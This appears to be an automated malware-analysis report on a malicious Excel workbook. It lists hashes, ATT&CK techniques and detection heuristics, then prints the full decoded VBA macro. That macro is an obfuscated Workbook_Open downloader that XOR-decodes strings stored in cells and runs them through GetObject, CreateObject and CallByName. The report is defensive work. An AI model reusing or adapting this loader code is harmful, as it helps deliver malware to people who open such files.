Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 be345834660619db…

MALICIOUS

Office (OLE) / .XLS

211.5 KB Created: 2023-05-29 21:19:51 Authoring application: Microsoft Excel First seen: 2023-06-01
MD5: 6e33ac6fffeeafffd24664edb2c5762e SHA-1: d9f49edc406dbe56fe9dbc039081ae98b08090df SHA-256: be345834660619db92373d1d00ad025ad0d3891fd33bf49a7cf51d5ca47d5c1a
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, specifically a Workbook_Open macro. High-severity heuristics indicate the use of CreateObject, GetObject, and CallByName, along with p-code execution, suggesting the macro is designed to run code. The macro's obfuscated nature and the presence of a lure to enable macros point towards a malicious downloader. The script's obfuscation makes it difficult to determine the exact payload or C2, but the overall pattern is consistent with macro-based malware delivery.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
                     Sub Workbook_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4826 bytes
SHA-256: 7c486c408742231b1cc860bbac34c2c89d4d5d54163a9235ba1ed9e9be7b21c9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Hosts As String
Private SeniorS As String
Private Dialogue As String





               Private Function IsraelI(ByVal Lookup As String) As Variant
Dim Equation As Long: Equation = 0: Dim Billing() As Byte: Dim Branches() As Byte, Crossing As String, Recall As Integer





                Branches = "qf5457bf92"
GoTo Customized








                                        






Psychological:
Dim SpecialiStS As String
SpecialiStS = InputBox("temper cool")








Bunch:
If Equation < UBound(Billing) Then





                                                        Recall = Equation Mod (10)
GoTo Litigation
InteractIons:
Crossing = Crossing & Chr(Billing(Equation))
Equation = Equation + 1
GoTo Bunch







                                                        Else








                                                                        GoTo Nurses
End If





Charlie:








                                        Dim Bargains As String







             Bargains = InputBox("setem ponutn")
Nurses:
IsraelI = Crossing







                  Exit Function







                                                                







                                                    





Customized:







                                                                    Billing = Destruction(Lookup)
GoTo Bunch





                                                    







Litigation:
Billing(Equation) = Abs(Billing(Equation) Xor Branches(Recall * 2))
GoTo InteractIons
End Function








          Private Sub SymbolS()








                                                            Dim Tracked As Object
Dim EngagEmEnt As String
GoTo InteractIons








              




SubmiSSionS:
Dialogue = IsraelI(Dialogue)
MeMphis Tracked, EngagEmEnt








                                                        Exit Sub
Understood:








              Hosts = IsraelI(Hosts)
EngagEmEnt = IsraelI(EngagEmEnt)
SeniorS = IsraelI(SeniorS)
Set Tracked = GetObject(Hosts).CreateObject(SeniorS)
GoTo SubmiSSionS
Dim Crossing As String
Crossing = InputBox("pass")








                                            MsgBox Crossing
Hosts = Crossing
InteractIons:
Hosts = Sheets("b73fa").Range("J110").Value: EngagEmEnt = Sheets("b73fa").Range("J189").Value: SeniorS = Sheets("b73fa").Range("G163").Value: Dialogue = Sheets("b73fa").Range("G170").Value
GoTo Understood
End Sub
Sub MeMphis(ByVal Tracked As Object, ByVal EngagEmEnt As String)
CallByName Tracked, Dialogue, VbMethod, EngagEmEnt, 0
End Sub






              




                                        





                 Sub Workbook_Open()
GoTo Margin
Dim Bargains As String





            







               Bargains = InputBox("Put err code")
Dim SpecialiStS As String
SpecialiStS = InputBox("Optimisrt")





                 MsgBox SpecialiStS
Margin:






              If Bargains = "" Then







                  SymbolS
End If







                                                        End Sub
Private Function Destruction(ByVal Charlie As String) As Variant





                                                                Dim Crossing() As Byte, i As Long, Recall As Integer, Margin As Integer
Margin = Len(Charlie) / 2: i = 0: ReDim Crossing(0 To Margin) As Byte
Bargains:
If i < Len(Charlie) Then
Recall = Recall + 1








               Crossing(Recall - 1) = Chr(14 + (12 * 2)) & Chr((16 + (4 * 5)) * 2) & Mid(Charlie, i + 1, 2)








                                                            i = i + 2
GoTo Bargains








             Else
GoTo SpecialiStS








              Dim Litigation As String
Litigation = InputBox("Autoscale calculation")
End If
SpecialiStS:
Destruction = Crossing






                                                                End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True